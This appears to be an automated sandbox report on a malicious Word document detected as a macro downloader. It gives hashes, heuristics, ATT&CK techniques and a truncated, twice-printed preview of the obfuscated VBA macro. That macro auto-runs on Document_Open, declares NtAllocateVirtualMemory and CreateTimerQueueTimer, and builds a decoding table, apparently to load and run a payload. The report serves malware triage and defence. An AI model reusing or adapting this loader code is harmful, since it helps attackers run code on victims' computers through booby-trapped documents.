Office (OLE) malware analysis — malicious · 39e5933d46bcdc90

MALICIOUS

Office (OLE)

209.5 KB Created: 2017-12-06 14:56:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: 473500babd5f4afbeee82be60de3611f SHA-1: 43486f7030706588ed71dd16e7b06771ac3abf84 SHA-256: 39e5933d46bcdc90baeee09b4ea2419f872cfce5ff7b64f0dbabd13372d4067c

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating a downloader functionality. The presence of a Document_Open VBA macro further supports this, as such macros are commonly used to execute malicious code upon opening the document. The VBA code appears to be obfuscated, but the presence of API declarations like CreateTimerQueueTimer and NtAllocateVirtualMemory suggests attempts to interact with the system at a low level, likely for payload execution or persistence. No specific IOCs like URLs or file paths were directly extracted from the script, hence the family is unknown.

Heuristics 4

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17739 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17739 bytes
SHA-256: `e7c1542ba3ba307b06fe2af8e0f6d372fdf49813785a093b2234d52dc01c8759`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim fortieth As Integer Dim parliamentary As Long repute = "echinococcus" nofnof.demency elapse = 29 + 22 Pmt 0, elapse, 13315, 45089, 4 End Sub Attribute VB_Name = "soade" #If (23 - 13 + 390 + 29 - 83 + 354) > ((17 - 85 + 388) - (3 - 43 + 580) * 1) And Not ((109 - 59 - 22) - (118 - 14 - 76)) * 2 < (Win64) Then Public Declare Function birthday _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (appear As Any, ByVal anthropometry As Any, ByVal commandment As Any, ByVal unmeant As Any, ByVal ding As Any, ByVal cherubim As Any, ByVal mauritian As Any) As Long Public Declare Function garuda Lib _ "ntdll " Alias _ "NtAllocateVirtualMemory" (knobkerrie As Long, totus As Long, ByVal apostolic As Long, sunstrokeByVal As Long, cockney As Long, ByVal aforementioned As Long) As Long #ElseIf (12 - 85 + 473 + 13 - 125 + 412) > ((82 - 75 + 313) - (79 - 18 + 479) * 1) And ((52 - 23 - 1) - (7 - 108 + 129)) * 2 < (Win64) Then Public Declare PtrSafe Function razorsharp Lib "Shlwapi.dll " _ Alias "SleepConditionVariableSRW" (ByVal kedge As Any, maintainable As Any, nobody As Any, rustling As Any) As LongPtr Public Declare PtrSafe Function birthday Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (swaddling As Any, ByVal bookclub As Any, ByVal uniat As Any, ByVal materialistic As Any, ByVal nonindulgent As Any, ByVal regalia As Any, ByVal anastomotic As Any) As Long #End If Function dunces(gastroboletus, eau, dahlia) Select Case dahlia Case 44 + (10 / 2 - 5) dunces = gastroboletus \ eau Case 54 + (5 - 3) / 2 - 1 dunces = gastroboletus And eau Case 62 + (56 / 7 - 4 * 2) dunces = gastroboletus * eau End Select End Function Attribute VB_Name = "sagittal" Function roundsman() Dim capsella(255) As Byte unvitrified = 74 - 2 - 7 Do While unvitrified <= 90 + 1 capsella(unvitrified) = unvitrified - 65 unvitrified = unvitrified + 1 Loop unvitrified = 48 Do While unvitrified <= 50 + 8 capsella(unvitrified) = unvitrified + 4 unvitrified = unvitrified + 1 Loop unvitrified = 97 Do While unvitrified <= 120 + 3 capsella(unvitrified) = unvitrified - 71 unvitrified = unvitrified + 1 Loop capsella(47) = 63 unvitrified = 43 capsella(unvitrified) = 60 + 2 roundsman = capsella End Function Function lifelessly(churchdoor) Dim firman As Byte Dim equivocate As Variant Dim bisexual As Integer Dim blacken As Integer #If (12 - 9 + 397 + 13 - 8 + 295) > ((128 - 95 + 287) - (118 - 83 + 505) * 1) And ((1 - 100 + 127) - (90 - 100 + 38)) * 2 < (Win64) Then Dim lure As Byte Dim mastotermitidae As LongPtr chemiluminescent = 95 - 53 - 34 Dim aphonous As LongPtr Dim biographer As Byte Dim overwhelmingly As Integer Dim cloaca As LongPtr Dim blameworthiness As Integer #ElseIf (56 - 20 + 364 + 33 - 124 + 391) > ((110 - 91 + 301) - (49 - 14 + 505) * 1) And Not ((4 - 19 + 43) - (15 - 14 + 27)) * 2 < (Win64) Then Dim mastotermitidae As Long chemiluminescent = 76 - 96 + 24 Dim aphonous As Long Dim cloaca As Long #End If coparcener = VarPtr(mastotermitidae) dashboard = nanosecond(coparcener, VarPtr(churchdoor) + 8, chemiluminescent) basset = 87 - 71 - 17 aphonous = 80 - 113 + 33 condom = 6 - 53 + 47 cloaca = 46 - 106 + 9831 minnows = 102 - 19 + 4013 disculpate = 100 - 124 + 88 importunate = garuda(ByVal basset, _ aphonous, ByVal condom, cloaca, ByVal minnows, _ ByVal disculpate) honi = Fix(374) nothofagus = nothofagus nanosecond aphonous, mastotermitidae, 23 - 70 + 5930 antigone = 9 + 9 Pmt 0, antigone, 39177, 51259, 3 lifelessly = aphonous End Function Attribute VB_Name = "nofnof" Function friable(donor) As String Dim erinaceidae As Long Dim acclivous(6962) As Byte Dim cuminum As String Dim accredit(63) As Long betrothed = Math.Round(435) Dim correspond ... (truncated)

SHA-256: e7c1542ba3ba307b06fe2af8e0f6d372fdf49813785a093b2234d52dc01c8759

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
Dim fortieth As Integer
Dim parliamentary As Long
repute = "echinococcus"
nofnof.demency
elapse = 29 + 22
 Pmt 0, elapse, 13315, 45089, 4
End Sub





Attribute VB_Name = "soade"
#If (23 - 13 + 390 + 29 - 83 + 354) > ((17 - 85 + 388) - (3 - 43 + 580) * 1) And Not ((109 - 59 - 22) - (118 - 14 - 76)) * 2 < (Win64) Then
Public Declare Function birthday _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (appear As Any, ByVal anthropometry As Any, ByVal commandment As Any, ByVal unmeant As Any, ByVal ding As Any, ByVal cherubim As Any, ByVal mauritian As Any) As Long
Public Declare Function garuda Lib _
"ntdll   " Alias _
"NtAllocateVirtualMemory" (knobkerrie As Long, totus As Long, ByVal apostolic As Long, sunstrokeByVal As Long, cockney As Long, ByVal aforementioned As Long) As Long
#ElseIf (12 - 85 + 473 + 13 - 125 + 412) > ((82 - 75 + 313) - (79 - 18 + 479) * 1) And ((52 - 23 - 1) - (7 - 108 + 129)) * 2 < (Win64) Then
Public Declare PtrSafe Function razorsharp Lib "Shlwapi.dll  " _
Alias "SleepConditionVariableSRW" (ByVal kedge As Any, maintainable As Any, nobody As Any, rustling As Any) As LongPtr
Public Declare PtrSafe Function birthday Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (swaddling As Any, ByVal bookclub As Any, ByVal uniat As Any, ByVal materialistic As Any, ByVal nonindulgent As Any, ByVal regalia As Any, ByVal anastomotic As Any) As Long
#End If
Function dunces(gastroboletus, eau, dahlia)
Select Case dahlia
Case 44 + (10 / 2 - 5)
dunces = gastroboletus \ eau
Case 54 + (5 - 3) / 2 - 1
dunces = gastroboletus And eau
Case 62 + (56 / 7 - 4 * 2)
dunces = gastroboletus * eau
End Select
End Function

Attribute VB_Name = "sagittal"
Function roundsman()
Dim capsella(255) As Byte
unvitrified = 74 - 2 - 7
Do While unvitrified <= 90 + 1
capsella(unvitrified) = unvitrified - 65
unvitrified = unvitrified + 1
Loop
unvitrified = 48
Do While unvitrified <= 50 + 8
capsella(unvitrified) = unvitrified + 4
unvitrified = unvitrified + 1
Loop
unvitrified = 97
Do While unvitrified <= 120 + 3
capsella(unvitrified) = unvitrified - 71
unvitrified = unvitrified + 1
Loop
capsella(47) = 63
unvitrified = 43
capsella(unvitrified) = 60 + 2
roundsman = capsella
End Function
Function lifelessly(churchdoor)
Dim firman As Byte
Dim equivocate As Variant
Dim bisexual As Integer
Dim blacken As Integer
#If (12 - 9 + 397 + 13 - 8 + 295) > ((128 - 95 + 287) - (118 - 83 + 505) * 1) And ((1 - 100 + 127) - (90 - 100 + 38)) * 2 < (Win64) Then
Dim lure As Byte
Dim mastotermitidae As LongPtr
chemiluminescent = 95 - 53 - 34
Dim aphonous As LongPtr
Dim biographer As Byte
Dim overwhelmingly As Integer
Dim cloaca As LongPtr
Dim blameworthiness As Integer
#ElseIf (56 - 20 + 364 + 33 - 124 + 391) > ((110 - 91 + 301) - (49 - 14 + 505) * 1) And Not ((4 - 19 + 43) - (15 - 14 + 27)) * 2 < (Win64) Then
Dim mastotermitidae As Long
chemiluminescent = 76 - 96 + 24
Dim aphonous As Long
Dim cloaca As Long
#End If
coparcener = VarPtr(mastotermitidae)
dashboard = nanosecond(coparcener, VarPtr(churchdoor) + 8, chemiluminescent)
basset = 87 - 71 - 17
aphonous = 80 - 113 + 33
condom = 6 - 53 + 47
cloaca = 46 - 106 + 9831
minnows = 102 - 19 + 4013
disculpate = 100 - 124 + 88
importunate = garuda(ByVal basset, _
aphonous, ByVal condom, cloaca, ByVal minnows, _
ByVal disculpate)
honi = Fix(374)

nothofagus = nothofagus

nanosecond aphonous, mastotermitidae, 23 - 70 + 5930
antigone = 9 + 9
 Pmt 0, antigone, 39177, 51259, 3

lifelessly = aphonous
End Function


Attribute VB_Name = "nofnof"
Function friable(donor) As String
Dim erinaceidae As Long
Dim acclivous(6962) As Byte
Dim cuminum As String
Dim accredit(63) As Long
betrothed = Math.Round(435)

Dim correspond
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.